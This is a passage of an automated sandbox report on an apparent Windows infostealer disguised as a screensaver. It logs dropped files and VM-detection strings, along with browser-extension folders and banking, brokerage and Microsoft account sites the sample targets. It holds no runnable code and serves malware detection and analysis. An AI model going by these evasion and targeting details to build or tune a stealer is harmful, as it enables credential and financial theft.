Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-profile-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\_ssl.pyd Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-convert-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-filesystem-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-runtime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-handle-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-string-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-conio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\unicodedata.pyd Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\python312.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe API coverage: 4.9 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5276 Thread sleep count: 4083 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7456 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7136 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5304 Thread sleep count: 3541 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7496 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4352 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5292 Thread sleep count: 3324 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7460 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2608 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7436 Thread sleep count: 848 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7548 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7512 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8044 Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7996 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7288 Thread sleep count: 3837 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7288 Thread sleep count: 825 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7896 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7236 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7888 Thread sleep count: 4659 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7916 Thread sleep count: 304 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8152 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8164 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7724 Thread sleep count: 3229 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7580 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3440 Thread sleep count: 152 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7584 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4676 Thread sleep count: 2760 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2820 Thread sleep count: 998 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7252 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7896 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 0_2_00007FF73AE27E4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError, 0_2_00007FF73AE27E4C
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 0_2_00007FF73AE27E4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError, 0_2_00007FF73AE27E4C
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 0_2_00007FF73AE188D0 FindFirstFileExW,FindClose, 0_2_00007FF73AE188D0
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 0_2_00007FF73AE31EE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 0_2_00007FF73AE31EE4
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7EA46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 68_2_00007FF7F7EA46EC
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7EE88E0 FindFirstFileExA, 68_2_00007FF7F7EE88E0
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7E9E21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle, 68_2_00007FF7F7E9E21C
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 2_2_00007FF8A86F1490 GetSystemInfo, 2_2_00007FF8A86F1490
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af\ Jump to behavior
Source: getmac.exe, 00000031.00000003.2151790983.0000020D5DEAD000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000002.2152634842.0000020D5DEAE000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2151174026.0000020D5DE93000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vboxservice
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: g#jdfecodevmware
Source: getmac.exe, 00000031.00000003.2151790983.0000020D5DEAD000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000002.2152634842.0000020D5DEAE000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2151174026.0000020D5DE93000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmsrvc
Source: getmac.exe, 00000031.00000003.2151790983.0000020D5DEAD000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000002.2152634842.0000020D5DEAE000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2151174026.0000020D5DE93000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAW!
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: getmac.exe, 00000031.00000002.2152634842.0000020D5DE93000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2151174026.0000020D5DE93000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ssubkeyname"system\currentcontrolset\services\hyper-v\linkage"h
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: d2qemu-ga
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: qemu-ga
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmware
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327784022.0000028C876A3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2325587092.0000028C876A3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWncel%SystemRoot%\system32\mswsock.dlltative host not found.
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmusrvc
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmware)
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmwareservice
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmwareuser
Source: getmac.exe, 00000031.00000003.2151174026.0000020D5DE93000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: f8vmusrvc
Source: getmac.exe, 00000031.00000003.2151174026.0000020D5DE93000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-VT
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmwaretray
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2150926613.0000028C88DAD000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2322447495.0000028C88B6F000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2163848479.0000028C87C28000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2163106879.0000028C88B6F000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2153913048.0000028C88B6D000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2323961811.0000028C88B6F000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2154463139.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: fecodevmsrvc
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vboxtray
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: getmac.exe, 00000031.00000002.2152634842.0000020D5DEC1000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2151715495.0000020D5DEBE000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2151174026.0000020D5DE93000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: getmac.exe, 00000031.00000002.2152634842.0000020D5DEC1000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2151715495.0000020D5DEBE000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2151174026.0000020D5DE93000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmtoolsd
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmwareservicera
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 0_2_00007FF73AE2ABD8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF73AE2ABD8
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 2_2_00007FF8A86A7B30 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect, 2_2_00007FF8A86A7B30
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 0_2_00007FF73AE33AF0 GetProcessHeap, 0_2_00007FF73AE33AF0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 0_2_00007FF73AE2ABD8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF73AE2ABD8
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 0_2_00007FF73AE1BCE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00007FF73AE1BCE0
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 0_2_00007FF73AE1C760 SetUnhandledExceptionFilter, 0_2_00007FF73AE1C760
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 0_2_00007FF73AE1C57C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF73AE1C57C
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 2_2_00007FF8A8093068 IsProcessorFeaturePresent,00007FF8BA251730,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FF8BA251730,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_00007FF8A8093068
